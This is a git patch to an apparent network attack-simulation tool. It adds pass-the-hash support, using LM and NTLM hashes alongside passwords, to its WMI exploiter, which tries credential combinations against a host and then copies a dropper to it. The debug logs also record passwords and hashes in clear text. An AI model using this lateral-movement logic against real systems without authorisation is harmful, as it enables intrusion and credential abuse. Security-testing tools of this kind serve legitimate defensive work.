From d628a27595909f050bedfced8d6c100693c6051b Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Wed, 27 Sep 2017 18:30:44 +0300 Subject: [PATCH] Add pass-the-hash for wmi --- chaos_monkey/exploit/wmiexec.py | 42 ++++++++++++++++++--------------- 1 file changed, 23 insertions(+), 19 deletions(-) diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index 15ccb9375..05751f2d5 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -29,34 +29,36 @@ class WmiExploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", host) return False - user_password_pairs = self._config.get_exploit_user_password_pairs() + creds = self._config.get_exploit_user_password_or_hash_product() - for user, password in user_password_pairs: - LOG.debug("Attempting to connect %r using WMI with password '%s'", - host, password) + for user, password, lm_hash, ntlm_hash in creds: + LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) wmi_connection = WmiTools.WmiConnection() try: - wmi_connection.connect(host, - user, - password) + wmi_connection.connect(host, user, password, None, lm_hash, ntlm_hash) except AccessDeniedException: - LOG.debug("Failed connecting to %r using WMI with user,password ('%s','%s')", - host, user, password) + LOG.debug("Failed connecting to %r using WMI with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) continue - except DCERPCException, exc: - report_failed_login(self, host, user, password) - LOG.debug("Failed connecting to %r using WMI with user,password: ('%s','%s')", - host, user, password) + except DCERPCException as exc: + report_failed_login(self, host, user, password, lm_hash, ntlm_hash) + LOG.debug("Failed connecting to %r using WMI with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) continue - except socket.error, exc: - LOG.debug("Network error in WMI connection to %r with user,password: ('%s','%s') (%s)", - host, user, password, exc) + except socket.error as exc: + LOG.debug("Network error in WMI connection to %r with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) return False - except Exception, exc: - LOG.debug("Unknown WMI connection error to %r with user,password: ('%s','%s') (%s):\n%s", - host, user, password, exc, traceback.format_exc()) + except Exception as exc: + LOG.debug("Unknown WMI connection error to %r with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s", + host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc()) return False host.learn_credentials(user, password) @@ -77,6 +79,8 @@ class WmiExploiter(HostExploiter): self._config.dropper_target_path, user, password, + lm_hash, + ntlm_hash, self._config.smb_download_timeout) if not remote_full_path: